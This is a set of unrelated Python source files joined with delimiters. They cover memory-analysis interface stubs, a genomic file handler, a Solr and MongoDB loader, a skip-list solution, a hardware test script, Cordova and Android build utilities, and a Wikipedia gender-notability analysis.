:param obj: a pointer.
"""
raise NotImplementedError('Please implement all methods')
def container_of(self, memberaddr, typ, membername):
"""
From a pointer to a member, returns the parent struct.
Returns the instance of typ(), in which the member "membername' is really.
Useful in some Kernel linked list which used members as prec,next pointers.
:param memberadd: the address of membername.
:param typ: the type of the containing structure.
:param membername: the membername.
Stolen from linux kernel headers.
const typeof( ((typ *)0)->member ) *__mptr = (ptr);
(type *)( (char *)__mptr - offsetof(type,member) );})
"""
raise NotImplementedError('Please implement all methods')
def offsetof(self, typ, membername):
"""
Returns the offset of a member in a structure.
:param typ: the structure type.
:param membername: the membername in that structure.
"""
raise NotImplementedError('Please implement all methods')
def ctypes_to_python_array(self, array):
"""Converts an array of undetermined Basic self.__ctypes class to a python array,
by guessing it's type from it's class name.
This is a bad example of introspection.
"""
raise NotImplementedError('Please implement all methods')
def array2bytes(self, array):
"""Converts an array of undetermined Basic self.__ctypes class to a byte string,
by guessing it's type from it's class name.
This is a bad example of introspection.
"""
raise NotImplementedError('Please implement all methods')
def bytes2array(self, bytes, typ):
"""Converts a bytestring in a self.__ctypes array of typ() elements."""
raise NotImplementedError('Please implement all methods')
def pointer2bytes(self, attr, nbElement):
"""
Returns an array from a self.__ctypes POINTER, given the number of elements.
:param attr: the structure member.
:param nbElement: the number of element in the array.
"""
raise NotImplementedError('Please implement all methods')
def get_subtype(self, cls):
"""get the subtype of a pointer, array or basic type with haystack quirks."""
raise NotImplementedError('Please implement all methods')
class IConstraintsConfigHandler(object):
"""Handles constraints as specific in a file"""
def read(self, filename):
"""
:param filename:
:return:
"""
class IModuleConstraints(object):
"""Defines the constraints configuration for a number of records.
Each structure is associated to a list of constraint per field of that record.
x = IModuleConstraints()
[...[
x['struct_1'] contains a dict()
x['struct_1']['field1'] contains a list of contraints.
"""
def get_constraints(self):
"""
get the list of record_type_name,IConstraint for all fields of
:return dict
"""
raise NotImplementedError('Please implement all methods')
def set_constraints(self, record_type_name, record_constraints):
"""
Add constraints for that record_type name
:param record_type_name:
:param record_constraints:
:return
"""
raise NotImplementedError('Please implement all methods')
def get_dynamic_constraints(self):
"""
get the record_type_name,IRecordTypeDynamicConstraintsValidator
:return dict
"""
raise NotImplementedError('Please implement all methods')
def set_dynamic_constraints(self, record_type_name, record_constraints):
"""
Add dynamic constraints validator for that record_type name
:param record_type_name: str
:param record_constraints: IRecordTypeDynamicConstraintsValidator
:return:
"""
raise NotImplementedError('Please implement all methods')
class IRecordConstraints(object):
"""
Holds the constraints for fields of a specific record type.
"""
def get_fields(self):
"""get the list of field names."""
raise NotImplementedError('Please implement all methods')
def get_constraints_for_field(self, field_name):
"""get the list of IConstraint for a field"""
raise NotImplementedError('Please implement all methods')
class IConstraint(object):
"""
Defines a constraint validation test for a field.
Class must implement contains.
The test is : "if attr not in <IConstraint instance>"
"""
def __contains__(self, obj):
raise NotImplementedError('Please implement all methods')
class IRecordConstraintsValidator(object):
"""
The worker class that validates all cp
"""
def is_valid(self, record):
"""
Checks if each member field of record has coherent data
with the constraints that exists for this record
For each Field, check on of the three case,
a) basic types (check for expectedValues),
if field as some expected values in expectedValues
check field value against expectedValues[fieldname]
if False, return False, else continue
b) struct(check isValid)
check if the inner struct isValid()
if False, return False, else continue
c) is an array , recurse validation
d) Pointer(check valid_address or expectedValues is None == NULL )
if field as some expected values in expectedValues
( None or 0 ) are the only valid options to design NULL pointers
check field get_pointee_address() value against expectedValues[fieldname] // if NULL
if True(address is NULL and it's a valid value), continue
check get_pointee_address against is_valid_address()
if False, return False, else continue
"""
raise NotImplementedError('Please implement all methods')
def load_members(self, record, max_depth):
"""
:param record:
:param max_depth:
:return:
"""
raise NotImplementedError('Please implement all methods')
class IRecordTypeDynamicConstraintsValidator(object):
"""
A record-type-based constraints validation class
"""
def get_record_type_name(self):
"""Return the name of the record_type for which these advanced checks can occur"""
raise NotImplementedError('Please implement all methods')
def is_valid(self, record):
"""
Advanced checks that cannot be expressed in the constraints files
"""
raise NotImplementedError('Please implement all methods')
# TODO get_list_tuples |
<filename>web-interface/app/application/src/seqfiles/seqfile_bunch.py<gh_stars>0
import os.path
import gzip
from Bio import SeqIO
from application.src.samples.samples import Samples
from application.src.metatemplates.base.tempfile import TempFile
from .db import DBSeqFile
from .types import SeqFileTypes
class SeqFilesBunch(TempFile):
main_dir = "/uploads/samples";
tempfilename = "last_generated_assembly_file.fasta";
attachement_prefix = "fasta_";
extension = "fasta";
def __init__(self, sample_id: int):
self.sample_id = sample_id;
self.sample = Samples.fetch("view_samples_base", self.sample_id);
self.consensus_file = self._fetch_file(self.sample_id,
SeqFileTypes.CONSENSUS_FILE);
self.contigs_file = self._fetch_file(self.sample_id,
SeqFileTypes.CONTIGS_FILE);
self.scaffolds_file = self._fetch_file(self.sample_id,
SeqFileTypes.SCAFFOLDS_FILE);
self.read_files = self._get_reads();
@classmethod
def _fetch_file(cls, sample_id: int, sftype: SeqFileTypes) -> "SeqFile":
seqfile = DBSeqFile.get_seqfile(sample_id, sftype);
seqfile.exists = seqfile.check_if_exists();
return seqfile;
def _get_reads(self) -> list:
reads = [];
if self.sample["library_layout_paired"]:
sf = self._fetch_file(self.sample_id, SeqFileTypes.FWREAD_FILE);
reads.append(sf);
sf = self._fetch_file(self.sample_id, SeqFileTypes.RVREAD_FILE);
reads.append(sf);
return reads;
def get_consensus_sequence(self):
virusname = self.sample["gisaid_virusname"];
return self.consensus_file.get_sequence(header=virusname);
def write_gisiad_tempfile(self, file: str) -> None:
if not self.consensus_file.exists:
raise Exception("No consensus file found.");
seqfile = self.consensus_file.get_file();
seqdata = SeqIO.read(seqfile, self.consensus_file.extension);
seqdata.id = self.sample["gisaid_virusname"];
seqdata.name = "";
seqdata.description = "";
with open(file, "w") as outf:
SeqIO.write(seqdata, outf, "fasta");
def zip_file_data(self, in_file: "file", out_file: str) -> None:
with open(in_file, 'rb') as f_in, gzip.open(out_file, 'wb') as f_out:
f_out.writelines(f_in);
def write_ena_contigs_tempfile(self, file: str) -> None:
self.zip_file_data(self.contigs_file.get_file(), file);
def write_ena_scaffolds_tempfile(self, file: str) -> None:
self.zip_file_data(self.scaffolds_file.get_file(), file);
def has_reads(self) -> bool:
for read in self.read_files:
if not read.exists: return False;
return True;
def get_display_details(self) -> dict:
d = {};
d["consensus"] = self.consensus_file.get_display_details();
d["contigs"] = self.contigs_file.get_display_details();
d["scaffolds"] = self.scaffolds_file.get_display_details();
d["reads"] = [];
for r in self.read_files:
d["reads"].append(r.get_display_details());
return d;
|
#!/usr/bin/env python3
import os, sys
import traceback
from pymongo import MongoClient
import random
from bson.objectid import ObjectId
from solr import SOLR
from solr import SOLR_CORE_NAME
class SearchSolr():
def __init__(self, ip='127.0.0.1', solr_core=SOLR_CORE_NAME):
self.solr_url = 'http://'+ ip +':8999/solr'
self.solr_core = solr_core
self.solr = SOLR(self.solr_url)
def load_data(self, select='*:*', fields=[], max_num=10, flag=False):
try:
def pro_x(x):
y = {}
y['store_id'] = x['store_id'][0]
y['category'] = x['category'][0]
y['instruction'] = x['instruction'][0]
if 'entities' in x:
y['entities'] = x['entities']
else:
y['entities'] = ['']
y['answers'] = x['answer']
y['emotion_name'] = 'null'
y['emotion_url'] = 'null'
if 'media' in x:
y['media'] = x['media'][0]
y['timeout'] = '15'
else:
y['media'] = 'null'
y['timeout'] = '0'
return y
Data = {}
def pro_y(x):
y = {}
y['store_id'] = x['store_id'][0]
y['category'] = x['category'][0]
y['intent'] = x['intent']
y['questions'] = x['question']
if 'entities' in x:
y['entities'] = x['entities']
else:
y['entities'] = ''
if y['intent']+'|'+y['entities'] in Data:
Data[y['intent']+'|'+y['entities']]['questions'].append(x['question'][0])
else:
Data[y['intent']+'|'+y['entities']] = y
return y
if flag == True:
data = [pro_x(x) for x in self.solr.query_solr(self.solr_core,
select, fields, max_num).docs]
else:
data = [pro_y(x) for x in self.solr.query_solr(self.solr_core,
select, fields, max_num).docs]
data = []
for key in Data.keys():
data.append(Data[key])
return data
except:
traceback.print_exc()
return None
class Mongodb():
def __init__(self, db_name, ip='127.0.0.1', port=27017):
self.db_name = db_name
self.db = MongoClient(ip, port)[db_name]
self.db_test = MongoClient(ip, port)[db_name+'_test']
self.solr_url = 'http://'+ ip +':8999/solr'
self.solr_core = SOLR_CORE_NAME
self.solr = SOLR(self.solr_url)
def write(self, collection, data):
try:
self.db[collection].drop()
self.db[collection].insert(data)
self.db_test[collection].drop()
self.db_test[collection].insert(data)
return 1
except:
traceback.print_exc()
return 0
def write_data2solr(self, collection):
query = 'scene_str:'+self.db_name+' AND topic_str:' +\
collection
self.solr.delete_solr_by_query(self.solr_core, query)
for x in self.db[collection].find():
data_one = x.copy()
data_one['scene'] = self.db_name
data_one['topic'] = collection
data_one['_id'] = str(data_one['_id'])
if collection in ['instruction']:
self.solr.update_solr(data_one, self.solr_core)
continue
if 'super_intention' in data_one:
if data_one['super_intention'] == '':
data_one['super_intention'] = 'null'
data_one.pop('questions')
for q in x['questions']:
data_one['question'] = q
data_one['question_ik'] = q
data_one['question_cn'] = q
self.solr.update_solr(data_one, self.solr_core)
if __name__ == '__main__':
mongo = Mongodb(db_name='bookstore')
s = SearchSolr(solr_core='instruction')
data = s.load_data(max_num=100, flag=True)
mongo.write(collection='instruction', data=data)
mongo.write_data2solr(collection='instruction')
s = SearchSolr(solr_core='automata')
data = s.load_data(max_num=100000)
mongo.write(collection='automata', data=data)
mongo.write_data2solr(collection='automata')
|
'''
设计跳表
不使用任何库函数,设计一个跳表。
跳表是在 O(log(n)) 时间内完成增加、删除、搜索操作的数据结构。跳表相比于树堆与红黑树,其功能与性能相当,
并且跳表的代码长度相较下更短,其设计思想与链表相似。
例如,一个跳表包含 [30, 40, 50, 60, 70, 90],然后增加 80、45 到跳表中,以下图的方式操作:
<NAME> [CC BY-SA 3.0], via Wikimedia Commons
跳表中有很多层,每一层是一个短的链表。在第一层的作用下,增加、删除和搜索操作的时间复杂度不超过 O(n)。
跳表的每一个操作的平均时间复杂度是 O(log(n)),空间复杂度是 O(n)。
在本题中,你的设计应该要包含这些函数:
bool search(int target) : 返回target是否存在于跳表中。
void add(int num): 插入一个元素到跳表。
bool erase(int num): 在跳表中删除一个值,如果 num 不存在,直接返回false. 如果存在多个 num ,删除其中任意一个即可。
了解更多 : https:#en.wikipedia.org/wiki/Skip_list
注意,跳表中可能存在多个相同的值,你的代码需要处理这种情况。
样例:
Skiplist skiplist = new Skiplist()
skiplist.add(1)
skiplist.add(2)
skiplist.add(3)
skiplist.search(0) # 返回 false
skiplist.add(4)
skiplist.search(1) # 返回 true
skiplist.erase(0) # 返回 false,0 不在跳表中
skiplist.erase(1) # 返回 true
skiplist.search(1) # 返回 false,1 已被擦除
约束条件:
0 <= num, target <= 20000
最多调用 50000 次 search, add, 以及 erase操作。
'''
'''
思路:使用随机、多级链表实现跳表
使用单向链表节点Node,它有2个指针,next指向同级的下一个节点,down指向下级节点
输入最大是50000次,可以使用16级的索引
为避免插入、删除操作造成2个索引间隔过大,使用randomLevel,50%的几率只在原表中插入,50%几率生成1级索引,25%几率生成2级索引,。。。
'''
class Node:
def __init__(self, val, next):
self.val = val
self.next = next
self.down = None
class Skiplist:
def __init__(self):
self.maxLvl = 16 # 最大层数为16,可以支持10万级的数据search、add、erase时间复杂度为O(logn)
self.heads = [None] * self.maxLvl
for i in range(self.maxLvl):
self.heads[i] = Node(-1, Node(float('inf'), None))
for i in range(self.maxLvl - 1):
self.heads[i].down = self.heads[i + 1]
def search(self, target: int) -> bool:
p = self.heads[0]
for lv in range(self.maxLvl):
while p.next.val < target: # 在这一层查找目标,找到>=目标后,进入下一层
p = p.next
if p.next.val == target:
return True
p = p.down
return False
def add(self, num: int) -> None:
lvls = self.randomLevel()
p = self.heads[0]
needDInsPrev = []
# 查找
for lv in range(self.maxLvl):
while p.next.val < num:
p = p.next
if (self.maxLvl - lv) <= lvls: # 加入待插入list
needDInsPrev.append(p)
p = p.down
# 插入
for prev in needDInsPrev:
prev.next = Node(num, prev.next)
# 维护向下的指针
for i in range(len(needDInsPrev) - 1):
needDInsPrev[i].next.down = needDInsPrev[i + 1].next
def erase(self, num: int) -> bool:
p = self.heads[0]
needDelPrev = []
# 查找
for lv in range(self.maxLvl):
while p.next.val < num:
p = p.next
if p.next.val == num: # 在该层找到目标,加入待删除list
needDelPrev.append(p)
p = p.down
# 删除
if len(needDelPrev) == 0:
return False
for prev in needDelPrev:
prev.next = prev.next.next
return True
def randomLevel(self):
import random
lvl = 1
for i in range(self.maxLvl - 1):
if random.randint(0, 99) % 2:
lvl += 1
else:
break
return lvl
skiplist = Skiplist()
skiplist.add(1)
skiplist.add(2)
skiplist.add(3)
print(skiplist.search(0)) # 返回 false
skiplist.add(4)
print(skiplist.search(1)) # 返回 true
print(skiplist.erase(0)) # 返回 false,0 不在跳表中
print(skiplist.erase(1)) # 返回 true
print(skiplist.search(1)) # 返回 false,1 已被擦除
|
#!/usr/bin/env python3
#-----------------------------------------------------------------------------
# Title : PyRogue febBoard Module
#-----------------------------------------------------------------------------
# File : SingleNodeTest.py
# Created : 2016-11-09
# Last update: 2016-11-09
#-----------------------------------------------------------------------------
# Description:
# Rogue interface to FEB board
#-----------------------------------------------------------------------------
# This file is part of the LCLS2-PRL. It is subject to
# the license terms in the LICENSE.txt file found in the top-level directory
# of this distribution and at:
# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
# No part of the LCLS2-PRL, including this file, may be
# copied, modified, propagated, or distributed except according to the terms
# contained in the LICENSE.txt file.
#-----------------------------------------------------------------------------
import sys
import pyrogue as pr
import pyrogue.gui
import PyQt4.QtGui
import argparse
import Lsst5vDcPdu as board5v
import Lsst24vDcPdu as board24v
import time
# Set the argument parser
parser = argparse.ArgumentParser()
# Add arguments
parser.add_argument(
"--type",
type = str,
required = True,
help = "board type (5VC, 24VC, 24VD or 48VD)",
)
parser.add_argument(
"--ip",
type = str,
required = True,
help = "IP address",
)
parser.add_argument(
"--hwEmu",
type = bool,
required = False,
default = False,
help = "hardware emulation (false=normal operation, true=emulation)",
)
parser.add_argument(
"--pollEn",
type = bool,
required = False,
default = False,
help = "enable auto-polling",
)
# Get the arguments
args = parser.parse_args()
# Set base
base = pr.Root(name='base',description='')
# Determine the type
if ( args.type == '5VC' ):
# Add Base Device
base.add(board5v.Top(
ip = args.ip,
nChannels = 20,
shunts = (12.8, 12.8, 12.8, 12.8, 12.8, 12.8, 10e5, 10e5, 51.2, 51.2, 51.2, 51.2, 51.2, 51.2, 51.2, 51.2, 51.2, 51.2, 51.2, 51.2),
hwEmu = args.hwEmu,
))
elif ( args.type == '24VC'):
# Add Base Device
base.add(board24v.Top(
ip = args.ip,
hwEmu = args.hwEmu,
nChannels = 12,
shunts = ( 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4 ),
VScale = 0.03973,
IScale = 0.0488,
))
elif ( args.type == '24VD'):
# Add Base Device
base.add(board24v.Top(
ip = args.ip,
hwEmu = args.hwEmu,
nChannels = 12,
shunts = (4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4 ),
VScale = 0.03973,
IScale = 0.0488,
))
elif ( args.type == '48VD'):
# Add Base Device
base.add(board24v.Top(
ip = args.ip,
hwEmu = args.hwEmu,
nChannels = 12,
shunts = (4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4 ),
VScale = 0.06772,
IScale = 0.0282,
))
else:
raise ValueError("Invalid type (%s). Valid types are 5VC, 24VC, 24VD, 48VD" % (args.type) )
# Start the system
base.start(pollEn=args.pollEn)
base.Top.Fpga.Core.AxiVersion.printStatus()
## Create GUI
#appTop = PyQt4.QtGui.QApplication(sys.argv)
#appTop.setStyle('Fusion')
#guiTop = pyrogue.gui.GuiTop(group='rootMesh')
#guiTop.addTree(base)
#guiTop.resize(800, 1000)
base.Top.Fpga.Registers.PowerCycle()
#print("Starting GUI...\n");
# Run GUI
appTop.exec_()
base.stop()
exit()
|
<filename>scripts/scripting_utils.py
##
## Various util python methods which can be utilized and shared among different scripts
##
import os, shutil, glob, time, sys, platform, subprocess
from distutils.dir_util import copy_tree
def set_log_tag(t):
global TAG
TAG = t
############################################################
### colors for terminal (does not work in Windows... of course)
CEND = '\033[0m'
CBOLD = '\33[1m'
CITALIC = '\33[3m'
CURL = '\33[4m'
CBLINK = '\33[5m'
CBLINK2 = '\33[6m'
CSELECTED = '\33[7m'
CBLACK = '\33[30m'
CRED = '\33[31m'
CGREEN = '\33[32m'
CYELLOW = '\33[33m'
CBLUE = '\33[34m'
CVIOLET = '\33[35m'
CBEIGE = '\33[36m'
CWHITE = '\33[37m'
CBLACKBG = '\33[40m'
CREDBG = '\33[41m'
CGREENBG = '\33[42m'
CYELLOWBG = '\33[43m'
CBLUEBG = '\33[44m'
CVIOLETBG = '\33[45m'
CBEIGEBG = '\33[46m'
CWHITEBG = '\33[47m'
CGREY = '\33[90m'
CRED2 = '\33[91m'
CGREEN2 = '\33[92m'
CYELLOW2 = '\33[93m'
CBLUE2 = '\33[94m'
CVIOLET2 = '\33[95m'
CBEIGE2 = '\33[96m'
CWHITE2 = '\33[97m'
CGREYBG = '\33[100m'
CREDBG2 = '\33[101m'
CGREENBG2 = '\33[102m'
CYELLOWBG2 = '\33[103m'
CBLUEBG2 = '\33[104m'
CVIOLETBG2 = '\33[105m'
CBEIGEBG2 = '\33[106m'
CWHITEBG2 = '\33[107m'
############################################################
### file system util methods
def copy_file(sourceFile, destFile):
debug('copying: {0} -> {1}'.format(sourceFile, destFile))
shutil.copyfile(sourceFile, destFile)
def copy_files(fileNamePattern, sourceDir, destDir):
for file in glob.glob(sourceDir + '/' + fileNamePattern):
debug('copying: {0} -> {1}'.format(file, destDir))
shutil.copy(file, destDir)
def copy_dir_contents(sourceDir, destDir):
copy_tree(sourceDir, destDir)
def remove_files(fileNamePattern, sourceDir, log=True):
for file in glob.glob(sourceDir + '/' + fileNamePattern):
if log:
debug('deleting: ' + file)
os.remove(file)
def rename_file(fileNamePattern, newFileName, sourceDir):
for file in glob.glob(sourceDir + '/' + fileNamePattern):
debug('rename: {0} -> {1}'.format(file, newFileName))
os.rename(file, sourceDir + '/' + newFileName)
def remove_dir_if_exists(path):
if os.path.exists(path):
debug('deleting dir: ' + path)
shutil.rmtree(path)
else:
debug('cannot delete {0}. dir does not exist'.format(path))
def remove_file_if_exists(path):
if os.path.exists(path):
debug('deleting: ' + path)
os.remove(path)
else:
debug('cannot delete {0}. file does not exist'.format(path))
def clear_dir(dir):
shutil.rmtree(dir)
os.mkdir(dir)
def recreate_dir(dir):
if os.path.exists(dir):
shutil.rmtree(dir)
os.mkdir(dir)
def create_dir_if_not_exist(dir):
if not os.path.exists(dir):
os.makedirs(dir)
############################################################
### debug messages util methods
def debug(msg):
if not is_windows():
print(('{0}* [{1}][INFO]:{2} {3}').format(CBOLD, TAG, CEND, msg))
else:
print(('* [{0}][INFO]: {1}').format(TAG, msg))
def debug_green(msg):
if not is_windows():
print(('{0}* [{1}][INFO]:{2} {3}{4}{5}').format(CBOLD, TAG, CEND, CGREEN, msg, CEND))
else:
print(('* [{0}][INFO]: {1}').format(TAG, msg))
def debug_blue(msg):
if not is_windows():
print(('{0}* [{1}][INFO]:{2} {3}{4}{5}').format(CBOLD, TAG, CEND, CBLUE, msg, CEND))
else:
print(('* [{0}][INFO]: {1}').format(TAG, msg))
def error(msg, do_exit=False):
if not is_windows():
print(('{0}* [{1}][ERROR]:{2} {3}{4}{5}').format(CBOLD, TAG, CEND, CRED, msg, CEND))
else:
print(('* [{0}][ERROR]: {1}').format(TAG, msg))
if do_exit:
exit()
############################################################
### util
def check_submodule_dir(platform, submodule_dir):
if not os.path.isdir(submodule_dir) or not os.listdir(submodule_dir):
error('Submodule [{0}] folder empty. Did you forget to run >> git submodule update --init --recursive << ?'.format(platform))
exit()
def is_windows():
return platform.system().lower() == 'windows';
# https://stackoverflow.com/questions/17140886/how-to-search-and-replace-text-in-a-file-using-python
def replace_text_in_file(file_path, substring, replace_with):
# Read in the file
with open(file_path, 'r') as file:
filedata = file.read()
# Replace the target string
filedata = filedata.replace(substring, replace_with)
# Write the file out again
with open(file_path, 'w') as file:
file.write(filedata)
def execute_command(cmd_params, log=True):
if log:
debug_blue('Executing: ' + str(cmd_params))
subprocess.call(cmd_params)
def change_dir(dir):
os.chdir(dir)
def xcode_build(target, configuration='Release'):
execute_command(['xcodebuild', '-target', target, '-configuration', configuration, 'clean', 'build', '-UseModernBuildSystem=NO'])
def adb_uninstall(package):
execute_command(['adb', 'uninstall', package])
def adb_install_apk(path):
execute_command(['adb', 'install', '-r', path])
def adb_shell(app_package):
execute_command(['adb', 'shell', 'monkey', '-p', app_package, '1'])
def gradle_make_release_jar():
execute_command(['./gradlew', 'adjustCoreJarRelease'])
def gradle_make_debug_jar():
execute_command(['./gradlew', 'adjustCoreJarDebug'])
def gradle_run(options):
cmd_params = ['./gradlew']
for opt in options:
cmd_params.append(opt)
execute_command(cmd_params)
############################################################
### cordova specific
def _remove_platforms():
debug_green('Removing platforms ...')
cordova_remove_platform('android')
cordova_remove_platform('ios')
def clean_test_app(root_dir):
example_dir = '{0}/example'.format(root_dir)
sdk_name = 'com.adjust.sdk'
adjust_sdk_plugin_dir = '{0}/plugins/com.adjust.sdk'.format(example_dir)
debug_green('Removing cordova plugins ...')
os.chdir(example_dir)
subprocess.call(['cordova', 'plugin', 'rm', sdk_name])
subprocess.call(['cordova', 'plugin', 'rm', 'cordova-plugin-console'])
subprocess.call(['cordova', 'plugin', 'rm', 'cordova-plugin-customurlscheme'])
subprocess.call(['cordova', 'plugin', 'rm', 'cordova-plugin-dialogs'])
subprocess.call(['cordova', 'plugin', 'rm', 'cordova-plugin-whitelist'])
subprocess.call(['cordova', 'plugin', 'rm', 'cordova-plugin-device'])
subprocess.call(['cordova', 'plugin', 'rm', 'cordova-universal-links-plugin'])
remove_dir_if_exists(adjust_sdk_plugin_dir)
_remove_platforms()
def clean_example_app(root_dir):
test_dir = '{0}/test/app'.format(root_dir)
sdk_name = 'com.adjust.sdk'
test_plugin_name = 'com.adjust.test'
adjust_sdk_plugin_dir = '{0}/plugins/com.adjust.sdk'.format(test_dir)
adjust_sdk_test_plugin_dir = '{0}/plugins/com.adjust.test'.format(test_dir)
debug_green('Removing cordova plugins ...')
os.chdir(test_dir)
subprocess.call(['cordova', 'plugin', 'rm', sdk_name])
subprocess.call(['cordova', 'plugin', 'rm', test_plugin_name])
remove_dir_if_exists(adjust_sdk_plugin_dir)
remove_dir_if_exists(adjust_sdk_test_plugin_dir)
_remove_platforms()
def cordova_add_plugin(plugin_name, options=None):
cmd_params = ['cordova', 'plugin', 'add', plugin_name]
if not options == None:
for opt in options:
cmd_params.append(opt)
execute_command(cmd_params)
def cordova_remove_plugin(plugin_name):
execute_command(['cordova', 'plugin', 'remove', plugin_name])
def cordova_build(platform, options=None):
cmd_params = ['cordova', 'build', platform]
if not options == None:
for opt in options:
cmd_params.append(opt)
execute_command(cmd_params)
def cordova_run(platform):
execute_command(['cordova', 'run', platform])
def cordova_add_platform(platform):
execute_command(['cordova', 'platform', 'add', platform])
def cordova_remove_platform(platform):
execute_command(['cordova', 'platform', 'remove', platform])
|
from __future__ import print_function
__author__ = '<NAME>'
import pandas as pd
import numpy as np
from scipy.stats import itemfreq
import scipy.stats as stats
import util as ut
import pylab as plt
import os
import statsmodels.api as sm
class GlobalWikipediaPopularity:
"""
This class compares the global notebility men and women in Wikipedia using the number of language editions
in which an article exists as a proxy for notability
"""
def __init__(self, datapath, start, end):
self.people = pd.read_csv(datapath, delimiter=",", header=0)
print ("total num people %s"%len(self.people.index))
print (" num people not in EN %s"%len(self.people[(self.people.available_english == False)].index))
self.people = self.people[~pd.isnull(self.people.birth_year) & (self.people.birth_year <= 2015)]
# Create 'decade' and 'century' column
self.people['birth_decade'] = np.round(np.floor((self.people['birth_year']/10))*10)
self.people['birth_century'] = np.round(np.floor((self.people['birth_year']/100))*100)
self.pre = ""
self.post = ""
if start >= 0 and end >= 0:
self.pre = str(start)
self.post = str(end)
recent_people = self.people[(self.people.birth_year > start) & (self.people.birth_year <= end)]
self.people = recent_people
print ("num people born between %s and %s century %s "%(start, end, len(self.people.index)))
print ("num people born between %s and %s century %s "%(start, end, len(recent_people.index)))
print ("num people for which gender is available AND they are born between %s and 2015: %s "
%(year, len( recent_people[(recent_people.gender == "male") | (recent_people.gender == "female")])))
self.logfile = file("img/results-numlang"+self.pre+"-"+self.post+".txt", "w+")
def genderBoxplots(self, women, men, labels, path):
data = [women.edition_count.values, men.edition_count.values]
plt.figure()
plt.boxplot(data)
# mark the mean
means = [np.mean(x) for x in data]
print (means)
plt.scatter(range(1, len(data)+1), means, color="red", marker=">", s=20)
plt.ylabel('num editions')
plt.xticks(range(1, len(data)+1), labels)
plt.savefig(path+'/numeditions_gender_box_withOutlier'+self.pre+"-"+self.post+'.png', bbox_inches="tight")
plt.figure()
plt.boxplot(data, sym='')
# mark the mean
means = [np.mean(x) for x in data]
print (means)
plt.scatter(range(1, len(data)+1), means, color="red", marker=">", s=20)
plt.ylabel('num editions')
plt.xticks(range(1, len(data)+1), labels)
plt.savefig(path+'/numeditions_gender_box'+self.pre+"-"+self.post+'.png', bbox_inches="tight")
def analyze_numlangedition_per_decade(self):
interval = 10
decade = 1000
#decades_of_interest = np.arange(0, 2010, interval)
res = pd.DataFrame(columns = ('class', 'mean-men', "sem-men", 'mean-women', 'sem-women'))
#for decade in decades_of_interest:
print (self.people.shape)
print (self.people.head(n=1))
#print (self.people[(self.people.birth_year < 1000) & (self.people.birth_year > 0)].shape)
people = self.people[(self.people.birth_year < decade) & (self.people.birth_year >= 0 )]
print (people.shape)
resdict = self.analyze_num_lang_edition("0-1000", people)
res = res.append(resdict, ignore_index = True)
while (decade < 2015):
end = decade+interval
people = self.people[(self.people.birth_year >= decade) & (self.people.birth_year < end)]
print (decade)
print (decade+interval)
print (people.shape)
resdict = self.analyze_num_lang_edition(str(decade)+"-"+str(end), people)
res = res.append(resdict, ignore_index = True)
decade = end
ut.plot_shaded_lines(res["class"].values, res["mean-women"].values, res["mean-men"].values, res["sem-women"].values, res["sem-women"].values, 'Mean Num Editions', 'Birth Year',
'img/numedition_gender_deacdes'+self.pre+"-"+self.post+'.png')
def analyze_numlangedition_per_profession(self):
classes = self.people["class"].unique()
print (self.people["class"].nunique())
#print classes
res = pd.DataFrame(columns = ('class', 'mean-men', "sem-men", 'mean-women', 'sem-women'))
for pclass in classes:
people = self.people[self.people["class"] == pclass]
print (pclass)
classname = pclass.split("/")[-1]
print (classname)
resdict = self.analyze_num_lang_edition(classname, people)
res = res.append(resdict, ignore_index = True)
ut.plot_shaded_lines(res["class"].values, res["mean-women"].values, res["mean-men"].values, res["sem-women"].values, res["sem-women"].values, 'mean num editions', 'professions', 'img/numedition_gender_deacdes.png')
def get_ratio(self, female, male, normalize):
female_frequency_sorted = female[:, 1]
female_numedition_sorted = female[:,0]
male_frequency_sorted = male[:, 1]
male_numedition_sorted = male[:,0]
female_max = np.max(female_numedition_sorted)
male_max = np.max(male_numedition_sorted)
max = np.max([female_max, male_max])
male_sum = np.sum(male_frequency_sorted.item(ind) for ind in range(0, len(male_frequency_sorted)))
female_sum = np.sum(female_frequency_sorted.item(ind) for ind in range(0, len(female_frequency_sorted)))
ratio = {}
for i in range(1, max):
ind = np.where(male_numedition_sorted == i)
#print (ind)
if (ind > 0 and len(male_frequency_sorted[ind] == 1)):
if normalize:
male_val = male_frequency_sorted.item(ind) / float(male_sum)
else:
male_val = male_frequency_sorted.item(ind)
else:
male_val = 0
ind_f = np.where(female_numedition_sorted == i)
if(ind_f > 0 and len(female_frequency_sorted[ind_f]) == 1):
if normalize:
female_val = female_frequency_sorted.item(ind_f) / float(female_sum)
else:
female_val = female_frequency_sorted.item(ind_f)
ratio[i] = male_val/float(female_val)
#else:
# ratio.append(male_val/female_val)
return ratio
def analyze_num_lang_edition(self, classname, people):
path = "img/"+classname
men = people[people.gender =="male"]
women = people[people.gender =="female"]
#create folder if not exist
if not os.path.exists(path):
os.makedirs(path)
self.logfile.write("\n\n\n\ "+classname+"\n")
edition_counts = np.append(women.edition_count.values, men.edition_count.values)
labels = ['female ('+str(len(women.index))+')', 'male ('+str(len(men.index))+')']
#print edition_counts
#print type(edition_counts)probability that a score randomly drawn from population A will be greater than a score randomly drawn from population B.
max_num_editions = np.max(edition_counts)
#print max_num_editions
top_men = []
men_percentage = 0
topk = range(10, 110, 10)
if (men.shape[0] > 0):
men_percentage = [men[men.edition_count == x].shape[0]/float(men.shape[0]) for x in range(1, max_num_editions)]
self.logfile.write("\n % of local men ")
self.logfile.write(str(men[men.edition_count <2].shape[0]/float(men.shape[0])))
self.logfile.write("\n percentage men %s"%str(len(men.index)/float((len(women.index)+len(men.index)))))
men_vals = men.edition_count.order(ascending=True).values
women_percentage = 0
if (women.shape[0] > 0):
women_percentage = [women[women.edition_count == x].shape[0]/float(women.shape[0]) for x in range(1, max_num_editions)]
self.logfile.write("\n\n % local women ")
self.logfile.write(str(women[women.edition_count < 2].shape[0]/float(women.shape[0])))
self.logfile.write("\n percentage women %s"%str(len(women.index)/float((len(women.index)+len(men.index)))))
women_vals = women.edition_count.order(ascending=True).values
if (women.shape[0] > 0 and men.shape[0] > 0):
j_m = 0
j_w = 0
U, p = stats.mstats.mannwhitneyu(women.edition_count, men.edition_count)
ut.write_mannwithneyu(U, p, women.edition_count, men.edition_count, self.logfile)
#for i in topk:
# perc_men = len(men.edition_count.index) * i/100.0
# print "bottom %s percent of men are %s - mean %s - median %s"% (str(i), str(perc_men), np.mean(men_vals[:int(perc_men)]), np.median(men_vals[:int(perc_men)]))
